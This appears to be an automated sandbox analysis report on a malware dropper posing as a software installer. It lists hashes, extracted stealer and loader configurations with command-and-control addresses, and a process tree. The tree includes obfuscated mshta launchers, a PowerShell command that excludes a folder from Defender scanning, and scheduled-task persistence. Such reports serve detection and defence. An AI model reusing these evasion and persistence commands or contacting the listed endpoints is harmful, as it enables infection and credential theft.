Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
08-10-2021 15:07
211008-shl8xsefa9 1008-10-2021 05:38
211008-gbvqyadce8 1007-10-2021 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
23s -
max time network
211s -
platform
windows10_x64 -
resource
win10-ja-20210920 -
submitted
08-10-2021 05:38
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Malware Config
Extracted
vidar
41.2
916
https://mas.to/@serg4325
-
profile_id
916
Extracted
redline
media214
91.121.67.60:2151
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
raccoon
1.8.2
3a6818b104313fce1772361ea1977d608ac93da0
-
url4cnc
http://teletop.top/kaba4ello
http://teleta.top/kaba4ello
https://t.me/kaba4ello
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4612 4372 rundll32.exe 119 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral6/memory/3552-249-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral6/memory/3552-251-0x000000000041B23A-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral6/files/0x000400000001ac0d-154.dat family_socelars behavioral6/files/0x000400000001ac0d-169.dat family_socelars -
Arkei Stealer Payload 1 IoCs
resource yara_rule behavioral6/memory/2880-521-0x0000000000400000-0x0000000004A15000-memory.dmp family_arkei -
Vidar Stealer 3 IoCs
resource yara_rule behavioral6/memory/372-232-0x0000000004A40000-0x0000000004B16000-memory.dmp family_vidar behavioral6/memory/372-248-0x0000000000400000-0x0000000002E08000-memory.dmp family_vidar behavioral6/memory/4080-543-0x0000000002FA0000-0x0000000003076000-memory.dmp family_vidar -
resource yara_rule behavioral6/files/0x000400000001ac02-122.dat aspack_v212_v242 behavioral6/files/0x000400000001ac02-124.dat aspack_v212_v242 behavioral6/files/0x000400000001ac01-129.dat aspack_v212_v242 behavioral6/files/0x000400000001ac01-128.dat aspack_v212_v242 behavioral6/files/0x000400000001ac01-123.dat aspack_v212_v242 behavioral6/files/0x000400000001ac04-127.dat aspack_v212_v242 behavioral6/files/0x000400000001ac04-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
pid Process 2444 setup_installer.exe 712 setup_install.exe 1948 Thu166f9a8bbe80.exe 2768 Thu16205451b994.exe 3048 Thu165bd34b1e1d4d81.exe 2816 Thu161580bf75.exe 3556 Thu16f584bd3686.exe 372 Thu1628aafb3efd7c3d.exe 912 Thu16466b26f8b7.exe 2024 Thu16f3de88a335950bb.exe 2744 Thu164ba03be19.exe 2228 Thu167d514d2a7ac5a.exe 2812 xzhUawI0RVtPnQScGRybXKza.exe 2568 Thu1653d94a8da.exe 2120 Thu16f3de88a335950bb.exe -
Loads dropped DLL 7 IoCs
pid Process 712 setup_install.exe 712 setup_install.exe 712 setup_install.exe 712 setup_install.exe 712 setup_install.exe 712 setup_install.exe 2812 xzhUawI0RVtPnQScGRybXKza.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral6/files/0x000400000001ac28-279.dat themida behavioral6/files/0x000400000001ac2e-292.dat themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 41 ipinfo.io 42 ipinfo.io 218 ipinfo.io 219 ipinfo.io 22 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
pid pid_target Process procid_target 4348 2768 WerFault.exe 92 4848 2812 WerFault.exe 148 4652 372 WerFault.exe 95 1276 2768 WerFault.exe 92 5840 2768 WerFault.exe 92 6040 2768 WerFault.exe 92 6588 2768 WerFault.exe 92 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6948 schtasks.exe 6940 schtasks.exe -
Kills process with taskkill 2 IoCs
pid Process 1940 taskkill.exe 6352 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeCreateTokenPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeAssignPrimaryTokenPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeLockMemoryPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeIncreaseQuotaPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeMachineAccountPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeTcbPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeSecurityPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeTakeOwnershipPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeLoadDriverPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeSystemProfilePrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeSystemtimePrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeProfSingleProcessPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeIncBasePriorityPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeCreatePagefilePrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeCreatePermanentPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeBackupPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeRestorePrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeShutdownPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeAuditPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeSystemEnvironmentPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeChangeNotifyPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeRemoteShutdownPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeUndockPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeSyncAgentPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeEnableDelegationPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeManageVolumePrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeImpersonatePrivilege 3048 Thu165bd34b1e1d4d81.exe Token: SeCreateGlobalPrivilege 3048 Thu165bd34b1e1d4d81.exe Token: 31 3048 Thu165bd34b1e1d4d81.exe Token: 32 3048 Thu165bd34b1e1d4d81.exe Token: 33 3048 Thu165bd34b1e1d4d81.exe Token: 34 3048 Thu165bd34b1e1d4d81.exe Token: 35 3048 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 2816 Thu161580bf75.exe Token: SeDebugPrivilege 3208 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2268 wrote to memory of 2444 2268 setup_x86_x64_install.exe 76 PID 2268 wrote to memory of 2444 2268 setup_x86_x64_install.exe 76 PID 2268 wrote to memory of 2444 2268 setup_x86_x64_install.exe 76 PID 2444 wrote to memory of 712 2444 setup_installer.exe 77 PID 2444 wrote to memory of 712 2444 setup_installer.exe 77 PID 2444 wrote to memory of 712 2444 setup_installer.exe 77 PID 712 wrote to memory of 3572 712 setup_install.exe 80 PID 712 wrote to memory of 3572 712 setup_install.exe 80 PID 712 wrote to memory of 3572 712 setup_install.exe 80 PID 712 wrote to memory of 3204 712 setup_install.exe 81 PID 712 wrote to memory of 3204 712 setup_install.exe 81 PID 712 wrote to memory of 3204 712 setup_install.exe 81 PID 712 wrote to memory of 1192 712 setup_install.exe 82 PID 712 wrote to memory of 1192 712 setup_install.exe 82 PID 712 wrote to memory of 1192 712 setup_install.exe 82 PID 712 wrote to memory of 1512 712 setup_install.exe 83 PID 712 wrote to memory of 1512 712 setup_install.exe 83 PID 712 wrote to memory of 1512 712 setup_install.exe 83 PID 712 wrote to memory of 1816 712 setup_install.exe 84 PID 712 wrote to memory of 1816 712 setup_install.exe 84 PID 712 wrote to memory of 1816 712 setup_install.exe 84 PID 712 wrote to memory of 1708 712 setup_install.exe 85 PID 712 wrote to memory of 1708 712 setup_install.exe 85 PID 712 wrote to memory of 1708 712 setup_install.exe 85 PID 712 wrote to memory of 1744 712 setup_install.exe 86 PID 712 wrote to memory of 1744 712 setup_install.exe 86 PID 712 wrote to memory of 1744 712 setup_install.exe 86 PID 3204 wrote to memory of 1948 3204 cmd.exe 89 PID 3204 wrote to memory of 1948 3204 cmd.exe 89 PID 3204 wrote to memory of 1948 3204 cmd.exe 89 PID 712 wrote to memory of 1976 712 setup_install.exe 87 PID 712 wrote to memory of 1976 712 setup_install.exe 87 PID 712 wrote to memory of 1976 712 setup_install.exe 87 PID 712 wrote to memory of 2116 712 setup_install.exe 88 PID 712 wrote to memory of 2116 712 setup_install.exe 88 PID 712 wrote to memory of 2116 712 setup_install.exe 88 PID 712 wrote to memory of 2276 712 setup_install.exe 90 PID 712 wrote to memory of 2276 712 setup_install.exe 90 PID 712 wrote to memory of 2276 712 setup_install.exe 90 PID 1512 wrote to memory of 2816 1512 cmd.exe 91 PID 1512 wrote to memory of 2816 1512 cmd.exe 91 PID 1192 wrote to memory of 2768 1192 cmd.exe 92 PID 1192 wrote to memory of 2768 1192 cmd.exe 92 PID 1192 wrote to memory of 2768 1192 cmd.exe 92 PID 1708 wrote to memory of 3048 1708 cmd.exe 93 PID 1708 wrote to memory of 3048 1708 cmd.exe 93 PID 1708 wrote to memory of 3048 1708 cmd.exe 93 PID 1976 wrote to memory of 3556 1976 cmd.exe 96 PID 1976 wrote to memory of 3556 1976 cmd.exe 96 PID 1816 wrote to memory of 372 1816 cmd.exe 95 PID 1816 wrote to memory of 372 1816 cmd.exe 95 PID 1816 wrote to memory of 372 1816 cmd.exe 95 PID 712 wrote to memory of 3460 712 setup_install.exe 94 PID 712 wrote to memory of 3460 712 setup_install.exe 94 PID 712 wrote to memory of 3460 712 setup_install.exe 94 PID 1744 wrote to memory of 912 1744 cmd.exe 97 PID 1744 wrote to memory of 912 1744 cmd.exe 97 PID 1744 wrote to memory of 912 1744 cmd.exe 97 PID 712 wrote to memory of 1060 712 setup_install.exe 104 PID 712 wrote to memory of 1060 712 setup_install.exe 104 PID 712 wrote to memory of 1060 712 setup_install.exe 104 PID 2116 wrote to memory of 2024 2116 cmd.exe 103 PID 2116 wrote to memory of 2024 2116 cmd.exe 103 PID 2116 wrote to memory of 2024 2116 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:3572
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
PID:1948 -
C:\Users\Admin\Pictures\Adobe Films\N_TyAVmxzhOUw2TvvAi5TRbz.exe"C:\Users\Admin\Pictures\Adobe Films\N_TyAVmxzhOUw2TvvAi5TRbz.exe"6⤵PID:4672
-
-
C:\Users\Admin\Pictures\Adobe Films\U8iYjPAjOp4Gqwzn6LNHEAI6.exe"C:\Users\Admin\Pictures\Adobe Films\U8iYjPAjOp4Gqwzn6LNHEAI6.exe"6⤵PID:3236
-
-
C:\Users\Admin\Pictures\Adobe Films\fz2QtsnMS_QMhw6jBDQDGYeE.exe"C:\Users\Admin\Pictures\Adobe Films\fz2QtsnMS_QMhw6jBDQDGYeE.exe"6⤵PID:4080
-
-
C:\Users\Admin\Pictures\Adobe Films\v8w4_mm0XuMfXNyW19VwK8Dy.exe"C:\Users\Admin\Pictures\Adobe Films\v8w4_mm0XuMfXNyW19VwK8Dy.exe"6⤵PID:1048
-
C:\Users\Admin\Pictures\Adobe Films\v8w4_mm0XuMfXNyW19VwK8Dy.exe"C:\Users\Admin\Pictures\Adobe Films\v8w4_mm0XuMfXNyW19VwK8Dy.exe"7⤵PID:5896
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DyAukkd2AQn5J8i3U5mhru38.exe"C:\Users\Admin\Pictures\Adobe Films\DyAukkd2AQn5J8i3U5mhru38.exe"6⤵PID:2648
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6940
-
-
C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"7⤵PID:6928
-
-
-
C:\Users\Admin\Pictures\Adobe Films\oaK5D0O7uVKGTFBKGnaZ7dN4.exe"C:\Users\Admin\Pictures\Adobe Films\oaK5D0O7uVKGTFBKGnaZ7dN4.exe"6⤵PID:2880
-
-
C:\Users\Admin\Pictures\Adobe Films\mCktOc4UxxJNTcNIlFxoqMth.exe"C:\Users\Admin\Pictures\Adobe Films\mCktOc4UxxJNTcNIlFxoqMth.exe"6⤵PID:4984
-
-
C:\Users\Admin\Pictures\Adobe Films\e2ZOhELtIoeoDjCy2TX5s9Po.exe"C:\Users\Admin\Pictures\Adobe Films\e2ZOhELtIoeoDjCy2TX5s9Po.exe"6⤵PID:4976
-
-
C:\Users\Admin\Pictures\Adobe Films\KpQcb2p8ldvKORt9VApBevSL.exe"C:\Users\Admin\Pictures\Adobe Films\KpQcb2p8ldvKORt9VApBevSL.exe"6⤵PID:1072
-
-
C:\Users\Admin\Pictures\Adobe Films\xzhUawI0RVtPnQScGRybXKza.exe"C:\Users\Admin\Pictures\Adobe Films\xzhUawI0RVtPnQScGRybXKza.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2812 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 2487⤵
- Program crash
PID:4848
-
-
-
C:\Users\Admin\Pictures\Adobe Films\D38DTEuyn6q0yyNyVLYUx1sD.exe"C:\Users\Admin\Pictures\Adobe Films\D38DTEuyn6q0yyNyVLYUx1sD.exe"6⤵PID:2464
-
-
C:\Users\Admin\Pictures\Adobe Films\MuqMS8dfzYZK2nr0zFucZurv.exe"C:\Users\Admin\Pictures\Adobe Films\MuqMS8dfzYZK2nr0zFucZurv.exe"6⤵PID:1324
-
-
C:\Users\Admin\Pictures\Adobe Films\7rF_EvX6F7_IRQhYohIQiewX.exe"C:\Users\Admin\Pictures\Adobe Films\7rF_EvX6F7_IRQhYohIQiewX.exe"6⤵PID:4788
-
-
C:\Users\Admin\Pictures\Adobe Films\NCztMQwImWoB2y1c1d6S14gA.exe"C:\Users\Admin\Pictures\Adobe Films\NCztMQwImWoB2y1c1d6S14gA.exe"6⤵PID:3796
-
C:\Users\Admin\Pictures\Adobe Films\NCztMQwImWoB2y1c1d6S14gA.exe"C:\Users\Admin\Pictures\Adobe Films\NCztMQwImWoB2y1c1d6S14gA.exe"7⤵PID:5244
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rchh_Tujf3jZhOUdWSyznt8P.exe"C:\Users\Admin\Pictures\Adobe Films\rchh_Tujf3jZhOUdWSyznt8P.exe"6⤵PID:368
-
-
C:\Users\Admin\Pictures\Adobe Films\n2kKZ9S58mXb8ojP9MAru7dC.exe"C:\Users\Admin\Pictures\Adobe Films\n2kKZ9S58mXb8ojP9MAru7dC.exe"6⤵PID:1364
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵PID:5900
-
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵PID:5892
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:5884
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Qz0c00__QPUdvilI_eHGRIa_.exe"C:\Users\Admin\Pictures\Adobe Films\Qz0c00__QPUdvilI_eHGRIa_.exe"6⤵PID:4136
-
-
C:\Users\Admin\Pictures\Adobe Films\7EAoL70N_W2qyITO5_Yait31.exe"C:\Users\Admin\Pictures\Adobe Films\7EAoL70N_W2qyITO5_Yait31.exe"6⤵PID:4336
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:5832
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PGLlsL2mJKZoDvRnW9GK0vn7.exe"C:\Users\Admin\Pictures\Adobe Films\PGLlsL2mJKZoDvRnW9GK0vn7.exe"6⤵PID:4640
-
C:\Users\Admin\Pictures\Adobe Films\PGLlsL2mJKZoDvRnW9GK0vn7.exe"C:\Users\Admin\Pictures\Adobe Films\PGLlsL2mJKZoDvRnW9GK0vn7.exe"7⤵PID:3804
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yrbbXJlWxjkW8lxmfrlgAIQF.exe"C:\Users\Admin\Pictures\Adobe Films\yrbbXJlWxjkW8lxmfrlgAIQF.exe"6⤵PID:4712
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:6104
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_uQwgrsB4ygl2XZ0DRvHDZUg.exe"C:\Users\Admin\Pictures\Adobe Films\_uQwgrsB4ygl2XZ0DRvHDZUg.exe"6⤵PID:4564
-
-
C:\Users\Admin\Pictures\Adobe Films\dvMzKl2KLOgAdPQgoGEqEphj.exe"C:\Users\Admin\Pictures\Adobe Films\dvMzKl2KLOgAdPQgoGEqEphj.exe"6⤵PID:2328
-
-
C:\Users\Admin\Pictures\Adobe Films\tq_agUgFY_2YYX_Y9pFeQ_1m.exe"C:\Users\Admin\Pictures\Adobe Films\tq_agUgFY_2YYX_Y9pFeQ_1m.exe"6⤵PID:4852
-
-
C:\Users\Admin\Pictures\Adobe Films\cw68SeIc7MdoIG18gQBC8VWI.exe"C:\Users\Admin\Pictures\Adobe Films\cw68SeIc7MdoIG18gQBC8VWI.exe"6⤵PID:4140
-
-
C:\Users\Admin\Pictures\Adobe Films\egdIOc3XR2x40DYlMdbplJev.exe"C:\Users\Admin\Pictures\Adobe Films\egdIOc3XR2x40DYlMdbplJev.exe"6⤵PID:4860
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:192
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe"C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe"6⤵PID:5144
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE (CrEATEoBjeCT ( "wsCrIpt.shELl" ).RUn( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))7⤵PID:5376
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ("C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe") do taskkill /f /Im "%~nxQ"8⤵PID:4988
-
C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K99⤵PID:1448
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /Im "CMqGH5hQvycRIfatzLgANbsT.exe"9⤵
- Kills process with taskkill
PID:6352
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
PID:2768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 6566⤵
- Program crash
PID:4348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 6726⤵
- Program crash
PID:1276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 6326⤵
- Program crash
PID:5840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 6646⤵
- Program crash
PID:6040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 8886⤵
- Program crash
PID:6588
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2816 -
C:\Users\Admin\AppData\Roaming\4508606.scr"C:\Users\Admin\AppData\Roaming\4508606.scr" /S6⤵PID:4204
-
-
C:\Users\Admin\AppData\Roaming\2641781.scr"C:\Users\Admin\AppData\Roaming\2641781.scr" /S6⤵PID:4276
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:4756
-
-
-
C:\Users\Admin\AppData\Roaming\7326841.scr"C:\Users\Admin\AppData\Roaming\7326841.scr" /S6⤵PID:4588
-
-
C:\Users\Admin\AppData\Roaming\2702939.scr"C:\Users\Admin\AppData\Roaming\2702939.scr" /S6⤵PID:4728
-
-
C:\Users\Admin\AppData\Roaming\3401207.scr"C:\Users\Admin\AppData\Roaming\3401207.scr" /S6⤵PID:4920
-
C:\Users\Admin\AppData\Roaming\3401207.scr"C:\Users\Admin\AppData\Roaming\3401207.scr"7⤵PID:2268
-
-
-
C:\Users\Admin\AppData\Roaming\6830136.scr"C:\Users\Admin\AppData\Roaming\6830136.scr" /S6⤵PID:4996
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
PID:372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 372 -s 9286⤵
- Program crash
PID:4652
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu16466b26f8b7.exeThu16466b26f8b7.exe5⤵
- Executes dropped EXE
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu16f584bd3686.exeThu16f584bd3686.exe5⤵
- Executes dropped EXE
PID:3556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe5⤵
- Executes dropped EXE
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵PID:2276
-
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu164ba03be19.exe6⤵PID:3552
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵PID:3460
-
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
PID:2568 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:964
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"7⤵PID:2492
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:868
-
